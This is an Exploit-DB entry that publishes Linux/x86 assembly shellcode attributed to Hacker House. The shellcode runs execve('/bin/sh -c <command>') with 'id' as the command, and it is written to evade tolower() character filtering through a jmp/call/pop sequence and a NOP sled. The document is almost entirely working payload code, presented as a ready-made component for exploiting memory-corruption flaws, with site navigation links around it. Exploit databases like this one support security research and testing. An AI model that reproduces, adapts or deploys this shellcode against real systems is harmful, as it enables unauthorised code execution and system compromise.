Linux/x86 - execve("/bin/sh") + tolower() Shellcode

EDB-ID:

47240

CVE:

N/A

EDB Verified:

Author:

Hacker House

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2019-03-23

Vulnerable App: 
# tolower() execve() /bin/sh -c (user supplied command)
# shellcode to evade tolower() and friends, requires %esi
# to reference a valid writeable address (usually does)
.text
	.global _start
_start:
        jmp data
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
	nop
	nop
	nop
	nop
	nop
	nop
	nop
	nop
	nop
start:
	popl    %edi
        movl    %edi, %ecx     	       
        xorl    %eax,%eax            
	movl    %eax,%es:(%esi)
	pushl   %es:(%esi)
	pushl   $0x68732f2f            
	pushl   $0x6e69622f            
	movl    %esp,%ebx              
	movl    %eax,%es:(%esi)
	pushl   %es:(%esi)
	pushw   $0x632d               
	movl    %esp,%edi             
	movl    %eax,%es:(%esi)
	pushl   %es:(%esi)
	movl    %ecx,%eax
        movl    %eax,%es:(%esi)
	pushl   %es:(%esi)
	movl    %edi,%eax
        movl    %eax,%es:(%esi)
 	pushl   %es:(%esi)
        movl    %ebx,%eax
	movl    %eax,%es:(%esi)
	pushl   %es:(%esi)
	movl    %esp,%esi
	movl    %esi,%ecx
	xorl    %eax, %eax
	movb    $0x08, %al           
	addb    $0x03, %al 
	int     $0x80                
data:
	call start
    	#command
.ascii "id"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services